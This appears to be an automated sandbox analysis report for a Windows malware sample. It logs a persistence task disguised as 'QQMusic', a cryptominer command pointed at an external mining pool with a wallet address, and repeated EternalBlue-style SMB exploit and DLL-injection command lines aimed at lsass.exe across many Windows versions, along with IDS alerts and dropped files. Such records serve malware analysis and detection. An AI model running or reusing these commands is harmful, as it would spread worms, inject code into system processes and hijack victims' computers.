Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 15, 2024, 8:16 a.m. | June 15, 2024, 8:19 a.m. |
-
cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
3032-
schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
1484
-
-
-
taskkill.exe taskkill /f /im spreadEmnopq.exe
2168
-
-
-
ipconfig.exe ipconfig /flushdns
2604
-
-
spreadEmnopq.exe C:\ProgramData\spreadEmnopq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p WPU --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2528 -
-
ipconfig.exe ipconfig /flushdns
1632
-
-
SMB.exe C:\ProgramData\SMB.exe
2736 -
-
ipconfig.exe ipconfig /flushdns
2204
-
-
-
ipconfig.exe ipconfig /flushdns
3284
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3556-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3652
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3592-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3748
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3688-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3964
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3772-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4036
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3848-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3404
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3920-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3616
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4000-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3860
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3188-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3308
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3680-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3692
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3948-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3900
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3596-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3776
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3808-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3648
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3852-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3736
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3656-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3880
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3716-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
2372
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4012-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4144
-
-
-
ipconfig.exe ipconfig /flushdns
4240
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3384-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4368
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4164-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4472
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4288-
svchostlong.exe svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
4528
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4352-
svchostlong.exe svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
4576
-
-
-
ipconfig.exe ipconfig /flushdns
4876
-
-
-
ipconfig.exe ipconfig /flushdns
3876
-
-
-
ipconfig.exe ipconfig /flushdns
5548
-
-
-
ipconfig.exe ipconfig /flushdns
5808
-
Name | Response | Post-Analysis Lookup |
---|---|---|
103.56.168.192.in-addr.arpa | ||
are.nishabig.pro | ||
auto.c3pool.org | 18.163.115.97 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49172 -> 47.76.164.119:19999 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
TCP 192.168.56.101:50052 -> 192.168.56.103:445 | 2024217 | ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray | A Network Trojan was detected |
TCP 192.168.56.103:445 -> 192.168.56.101:50052 | 2024218 | ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response | A Network Trojan was detected |
TCP 192.168.56.101:50581 -> 192.168.56.103:135 | 2001581 | ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.101:49172 -> 47.76.164.119:19999 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
Suricata TLS
No Suricata TLS
section | .gfids |
section | .giats |
resource name | LNK |
resource name | SMB |
resource name | X64 |
resource name | X86 |
suspicious_features | Connection to IP address | suspicious_request | OPTIONS http://192.168.56.1/ |
suspicious_features | Connection to IP address | suspicious_request | OPTIONS http://192.168.56.1/ipc$ |
request | OPTIONS http://192.168.56.1/ |
request | OPTIONS http://192.168.56.1/ipc$ |
name | LNK | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00874428 | size | 0x0005d332 |
name | SMB | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00563fa0 | size | 0x00310484 |
name | X64 | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x003971a0 | size | 0x0014c800 |
name | X86 | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x004e39a0 | size | 0x00080600 |
file | C:\ProgramData\pcrecpp-0.dll |
file | C:\ProgramData\libiconv-2.dll |
file | C:\ProgramData\posh.dll |
file | C:\ProgramData\trch-0.dll |
file | C:\ProgramData\pcre-0.dll |
file | C:\ProgramData\trfo-2.dll |
file | C:\ProgramData\riar-2.dll |
file | C:\ProgramData\pcreposix-0.dll |
file | C:\ProgramData\coli-0.dll |
file | C:\ProgramData\tibe-2.dll |
file | C:\ProgramData\libxml2.dll |
file | C:\ProgramData\tibe-1.dll |
file | C:\ProgramData\xdvl-0.dll |
file | C:\ProgramData\adfw.dll |
file | C:\ProgramData\cnli-0.dll |
file | C:\ProgramData\esco-0.dll |
file | C:\ProgramData\svchostlong.exe |
file | C:\ProgramData\crli-0.dll |
file | C:\ProgramData\dmgd-1.dll |
file | C:\ProgramData\cnli-1.dll |
file | C:\ProgramData\iconv.dll |
file | C:\ProgramData\tucl-1.dll |
file | C:\ProgramData\svchostromance.exe |
file | C:\ProgramData\exma-1.dll |
file | C:\ProgramData\etchCore-0.x64.dll |
file | C:\ProgramData\etch-0.dll |
file | C:\ProgramData\etchCore-0.x86.dll |
file | C:\ProgramData\tibe.dll |
file | C:\ProgramData\posh-0.dll |
file | C:\ProgramData\etebCore-2.x86.dll |
file | C:\ProgramData\trfo.dll |
file | C:\ProgramData\tucl.dll |
file | C:\ProgramData\X86.dll |
file | C:\ProgramData\adfw-2.dll |
file | C:\ProgramData\libcurl.dll |
file | C:\ProgramData\exma.dll |
file | C:\ProgramData\zibe.dll |
file | C:\ProgramData\trfo-0.dll |
file | C:\ProgramData\riar.dll |
file | C:\ProgramData\zlib1.dll |
file | C:\ProgramData\serverlong.exe |
file | C:\ProgramData\ssleay32.dll |
file | C:\ProgramData\pcla-0.dll |
file | C:\ProgramData\eteb-2.dll |
file | C:\ProgramData\libeay32.dll |
file | C:\ProgramData\dmgd-4.dll |
file | C:\ProgramData\etebCore-2.x64.dll |
file | C:\ProgramData\X64.dll |
file | C:\ProgramData\trch.dll |
file | C:\ProgramData\trch-1.dll |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F |
